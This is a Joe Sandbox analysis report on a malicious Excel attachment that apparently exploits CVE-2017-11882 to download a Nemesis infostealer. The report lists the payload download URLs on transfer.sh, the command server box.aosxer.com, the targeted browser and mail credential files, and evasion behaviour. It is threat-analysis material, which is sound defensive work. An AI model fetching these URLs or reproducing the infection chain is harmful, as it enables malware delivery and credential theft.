Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_004057A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_004057A2

HIPS / PFW / Operating System Protection Evasion

barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\lyebkz.exe protection: execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\lyebkz.exe "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.txJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess created: C:\Users\user\AppData\Local\Temp\lyebkz.exe C:\Users\user\AppData\Local\Temp\lyebkz.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_0040F063
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: GetLocaleInfoW,6_2_0040C824
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,6_2_0040C83D
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,6_2_0040D0F3
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,6_2_0040C8A7
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_0040F150
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,6_2_0040795E
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: _strlen,EnumSystemLocalesA,6_2_0040F127
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_0040C9E6
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,6_2_0040F1F3
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_0040F1B7
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: GetLocaleInfoA,6_2_00413A47
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_0040CA52
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,6_2_0040D34B
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,6_2_0040EC6E
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: GetLocaleInfoA,6_2_00413CDB
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_0040ED85
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,6_2_0040D611
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,6_2_0040EE1D
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_0040EE91
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00404922 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_00404922
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00412F46 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,6_2_00412F46
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403640

Stealing of Sensitive Information

barindex
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts211
Windows Management Instrumentation		Path Interception1
Access Token Manipulation		1
Disable or Modify Tools		1
OS Credential Dumping		2
System Time Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium3
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts1
Scripting		Boot or Logon Initialization Scripts111
Process Injection		1
Deobfuscate/Decode Files or Information		11
Input Capture		2
File and Directory Discovery		Remote Desktop Protocol1
Data from Local System		Exfiltration Over Bluetooth11
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts12
Native API		Logon Script (Windows)Logon Script (Windows)1
Scripting		Security Account Manager118
System Information Discovery		SMB/Windows Admin Shares1
Email Collection		Automated Exfiltration1
Non-Standard Port		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts23
Exploitation for Client Execution		Logon Script (Mac)Logon Script (Mac)2
Obfuscated Files or Information		NTDS1
Query Registry		Distributed Component Object Model11
Input Capture		Scheduled Transfer2
Non-Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Masquerading		LSA Secrets341
Security Software Discovery		SSH1
Clipboard Data		Data Transfer Size Limits23
Application Layer Protocol		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Modify Registry		Cached Domain Credentials131
Virtualization/Sandbox Evasion		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items131
Virtualization/Sandbox Evasion		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc Filesystem1
Remote System Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)111
Process Injection		/etc/passwd and /etc/shadow1
System Network Configuration Discovery		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 786424 Sample: PURCHASE ORDER & SAMPLE IMA... Startdate: 18/01/2023 Architecture: WINDOWS Score: 100 44 Snort IDS alert for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 50 8 other signatures 2->50 8 EQNEDT32.EXE 12 2->8         started        13 EXCEL.EXE 53 12 2->13         started        process3 dnsIp4 40 transfer.sh 144.76.136.153, 443, 49173, 49174 HETZNER-ASDE Germany 8->40 26 C:\Users\user\AppData\Roaming\word.exe, PE32 8->26 dropped 28 C:\Users\user\AppData\...\maxdyn2.1[1].exe, PE32 8->28 dropped 66 Office equation editor establishes network connection 8->66 68 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->68 15 word.exe 19 8->15         started        30 C:\...\~$PURCHASE ORDER & SAMPLE IMAGE.xlsx, data 13->30 dropped file5 signatures6 process7 file8 32 C:\Users\user\AppData\Local\Temp\lyebkz.exe, PE32 15->32 dropped 42 Multi AV Scanner detection for dropped file 15->42 19 lyebkz.exe 15->19         started        signatures9 process10 signatures11 52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->52 54 May check the online IP address of the machine 19->54 56 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 19->56 58 2 other signatures 19->58 22 lyebkz.exe 12 10 19->22         started        process12 dnsIp13 34 box.aosxer.com 5.249.163.12, 49176, 49177, 49178 PORTLANEwwwportlanecomSE Sweden 22->34 36 api4.ipify.org 64.185.227.155, 443, 49175 WEBNXUS United States 22->36 38 api.ipify.org 22->38 60 Tries to steal Mail credentials (via file / registry access) 22->60 62 Tries to harvest and steal browser information (history, passwords, etc) 22->62 64 Installs a global keyboard hook 22->64 signatures14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PURCHASE ORDER & SAMPLE IMAGE.xlsx56%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
PURCHASE ORDER & SAMPLE IMAGE.xlsx60%VirustotalBrowse
PURCHASE ORDER & SAMPLE IMAGE.xlsx100%AviraEXP/CVE-2017-11882.Gen

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\maxdyn2.1[1].exe36%ReversingLabsWin32.Trojan.Nemesis
C:\Users\user\AppData\Roaming\word.exe36%ReversingLabsWin32.Trojan.Nemesis

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
5.2.word.exe.29a6a1b.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api4.ipify.org
64.185.227.155
truefalse
    		high
    transfer.sh
    		144.76.136.153
    		truefalse
      		high
      box.aosxer.com
      		5.249.163.12
      		truetrue
        		unknown
        api.ipify.org
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://api.ipify.org/false
            		high
            http://transfer.sh/get/I9BcJI/maxdyn2.1.exefalse
              		high
              https://transfer.sh/get/I9BcJI/maxdyn2.1.exefalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://transfer.sh/get/I9BcJI/maxdyn2.1.exemWDtEQNEDT32.EXE, 00000002.00000002.977467875.000000000028F000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://transfer.sh/9EQNEDT32.EXE, 00000002.00000002.977467875.00000000002DB000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://transfer.sh/get/I9BcJEQNEDT32.EXE, 00000002.00000002.977467875.00000000002DB000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://transfer.sh/xeEQNEDT32.EXE, 00000002.00000002.977467875.00000000002DB000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://nsis.sf.net/NSIS_ErrorErrorword.exe, 00000005.00000000.974627109.000000000040A000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmp, word.exe.2.dr, maxdyn2.1[1].exe.2.drfalse
                            		high
                            http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://transfer.sh/get/I9BcJI/maxdyn2.1.exeyWDtEQNEDT32.EXE, 00000002.00000002.977467875.000000000028F000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  144.76.136.153
                                  		transfer.shGermany
                                  		24940HETZNER-ASDEfalse
                                  64.185.227.155
                                  		api4.ipify.orgUnited States
                                  		18450WEBNXUSfalse
                                  5.249.163.12
                                  		box.aosxer.comSweden
                                  		42708PORTLANEwwwportlanecomSEtrue

                                  General Information

                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                  Analysis ID:786424
                                  Start date and time:2023-01-18 09:12:19 +01:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 7m 59s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:PURCHASE ORDER & SAMPLE IMAGE.xlsx
                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.expl.evad.winXLSX@8/12@9/3
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 95.5% (good quality ratio 92.6%)
                                  • Quality average: 86.6%
                                  • Quality standard deviation: 22.8%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 52
                                  • Number of non-executed functions: 44
                                  Cookbook Comments:
                                  • Found application associated with file extension: .xlsx
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Active ActiveX Object
                                  • Scroll down
                                  • Close Viewer

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  09:13:40API Interceptor242x Sleep call for process: EQNEDT32.EXE modified
                                  09:13:55API Interceptor869x Sleep call for process: lyebkz.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  144.76.136.153RFQ-BT5004423.docGet hashmaliciousBrowse
                                  • transfer.sh/get/mGCQGV/gstallabt4.2.exe
                                  SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtfGet hashmaliciousBrowse
                                  • transfer.sh/get/8LtEmv/mwele.exe
                                  pvv6dLm4nj.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/SFHHxF/gru3xt3b.exe
                                  Quote List.docGet hashmaliciousBrowse
                                  • transfer.sh/get/4KPgdY/mcland2.1.exe
                                  100112414_221209.docGet hashmaliciousBrowse
                                  • transfer.sh/get/iqb7h3/noicnneland.exe
                                  SecuriteInfo.com.Exploit.CVE-2018-0798.4.3863.8720.rtfGet hashmaliciousBrowse
                                  • transfer.sh/get/vO3WhH/nulight2.1.exe
                                  PO-AM2207586.xlsxGet hashmaliciousBrowse
                                  • transfer.sh/get/Xszsf2/fgc4.exe
                                  1.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/b02fuU/Ikwtsw_Dlwusohh.jpg
                                  BZfApQSvig.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/mv2A8U/Jpacuhx_Ytbwopcz.png
                                  l5LVNukfQm.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/2bMMvr/Ftqhdpj_Dwbqyzci.jpg
                                  ksuO9C24QH.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/qT523D/Wlniornez_Dablvtrq.bmp
                                  ksuO9C24QH.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/qT523D/Wlniornez_Dablvtrq.bmp
                                  file.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/EBgWOR/Jhkgft_Cptucfoi.bmp
                                  86503807.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/Fh5qw1/Yviliqfen.log
                                  24982297.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/7l55ti/Yqheqrnit.png
                                  67259493.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/sP0JXy/12.png
                                  89085041.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/TaUSBQ/Tzdtprkp.log
                                  11286208.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/1KEmBC/Odhxu.jpg
                                  tXDPyCfwcY.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/fvp22f/Aiebe.jpg
                                  4G5k6vDDlx.exeGet hashmaliciousBrowse
                                  • transfer.sh/get/a9xgDe/Gudsp.jpg

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  api4.ipify.orge-dekont20230116.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  EDD.CA.Form.htmlGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  FedEx Receipt_AWB# 1022355167663.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  swift_AAT_C20032244_17-01-2023.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  SecuriteInfo.com.Trojan.GenericKD.65029319.28303.7499.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  1Y5EXyqPIr.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  sLXZJY51v7.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  Payment Advice.htmlGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  SecuriteInfo.com.Win32.PWSX-gen.18384.24229.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  file.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  RFQs.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  Remittance copy.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  DHL Receipt_AWB8114704847178.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  FedEx Receipt_AWB114704847178.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  ABJ.batGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  SecuriteInfo.com.Gen.Variant.Nemesis.1808.20904.11024.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  SecuriteInfo.com.Trojan.PWS.Siggen3.25352.5095.31471.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  Final Payment 7news.shtmlGet hashmaliciousBrowse
                                  • 104.237.62.211
                                  K0XmTyabPq.exeGet hashmaliciousBrowse
                                  • 64.185.227.155
                                  Order_#TSL0094668937.exeGet hashmaliciousBrowse
                                  • 64.185.227.155

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  HETZNER-ASDEfile.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  prog.apkGet hashmaliciousBrowse
                                  • 144.76.58.8
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  ACC70EB94782931AB5F817A91B3C4CEDF4C3077FB497A.exeGet hashmaliciousBrowse
                                  • 148.251.234.93
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  how long can a landlord leave you without air-conditioning in florida 83948.jsGet hashmaliciousBrowse
                                  • 148.251.66.29
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  https://anydesk.com/en/downloads/windows?dv=win_exeGet hashmaliciousBrowse
                                  • 159.69.19.197
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  file.exeGet hashmaliciousBrowse
                                  • 95.217.49.230
                                  N0pq5eqonB.dllGet hashmaliciousBrowse
                                  • 78.47.204.80

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  7dcce5b76c8b17472d024758970a406bhttp://deb.clGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  Ref.No.FISGM1096.docGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  #U25b6#Ud83d#Udd18#U2500#U2500027-msg-62423.htmGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  RFQ-BT5004423.docGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  TinaWalter_Documents.docx.docGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  Scanned9343256.docmGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  ACH WlRE REMlTTANCE DETAILS.xlsxGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  ACH WlRE REMlTTANCE DETAILS.xlsxGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  ACH WlRE REMlTTANCE DETAILS.xlsxGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  ACH WlRE REMlTTANCE DETAILS.xlsxGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  https://lmsox.blob.core.windows.net/kilow/trial.html?sp=r&st=2023-01-10T19:25:15Z&se=2023-02-08T03:25:15Z&spr=https&sv=2021-06-08&sr=b&sig=Si38Dhkq%2F5OcCGnpOVTmS5ySMjvIhIMGarcjfeESPeQ%3DGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  RFQ 4828321.docGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  SecuriteInfo.com.Exploit.CVE-2018-0798.4.13594.1348.rtfGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.30184.11585.rtfGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  772461.xlsGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  490436.xlsGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  64bit.exeGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  64bit.exeGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  ACH REMlTTANCE_C0PY.xlsxGet hashmaliciousBrowse
                                  • 144.76.136.153
                                  https://www.bing.com/ck/a?!&&p=d3d52e65447c66ebJmltdHM9MTY3MzIyMjQwMCZpZ3VpZD0wMTM3YWY2Mi1jNzAwLTZlYjYtMTA1Yi1iZGViYzY4YjZmNmYmaW5zaWQ9NTE2MQ&ptn=3&hsh=3&fclid=0137af62-c700-6eb6-105b-bdebc68b6f6f&u=a1aHR0cHM6Ly9jcmVhdGl2ZW1lZGlhc29sdXRpb25zLm9yZy8&ntb=1?zc=matt@o3.solutionsGet hashmaliciousBrowse
